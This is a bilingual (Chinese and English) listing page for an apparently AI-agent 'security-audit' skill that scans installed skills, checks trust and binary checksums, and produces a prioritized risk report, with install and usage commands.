security-audit
对代理的完整技能堆栈进行全面的安全审核。将扫描器、差异器、信任验证器和运行状况监控器链接到单个评估中,并提供优先结果和信任证明。
安装 / 下载方式
TotalClaw CLI推荐
totalclaw install totalclaw:totalclaw~trypto1019-arc-security-auditcURL直接下载,无需登录
curl -fsSL https://skills.taituai.com/api/skills/totalclaw%3Atotalclaw~trypto1019-arc-security-audit/file -o trypto1019-arc-security-audit.md## 概述(中文)
对代理的完整技能堆栈进行全面的安全审核。将扫描器、差异器、信任验证器和运行状况监控器链接到单个评估中,并提供优先结果和信任证明。
## 原文
# Security Audit
One command to audit your entire skill stack. Chains together arc-skill-scanner, arc-trust-verifier, and generates a comprehensive risk report with prioritized findings.
## Why This Exists
Running individual security tools one at a time is tedious. A full audit needs scanning, trust assessment, binary verification, and a unified report. This skill does it all in one pass.
## Commands
### Audit all installed skills
```bash
python3 {baseDir}/scripts/audit.py full
```
### Audit a specific skill
```bash
python3 {baseDir}/scripts/audit.py single --path ~/.openclaw/skills/some-skill/
```
### Generate audit report as JSON
```bash
python3 {baseDir}/scripts/audit.py full --json --output report.json
```
### Audit with trust attestations
```bash
python3 {baseDir}/scripts/audit.py full --attest
```
## What It Does
1. **Scans** every installed skill with arc-skill-scanner patterns
2. **Assesses trust** for each skill (provenance, code cleanliness, binary presence)
3. **Checks binary integrity** with SHA-256 checksums
4. **Generates a prioritized report** sorted by risk level
5. **Optionally creates trust attestations** for skills that pass all checks
## Output
The audit report includes:
- Summary: total skills scanned, findings by severity, overall risk level
- Per-skill breakdown: findings, trust score, recommendations
- Critical actions: what to fix immediately
- Trust attestations for passing skills (if --attest flag used)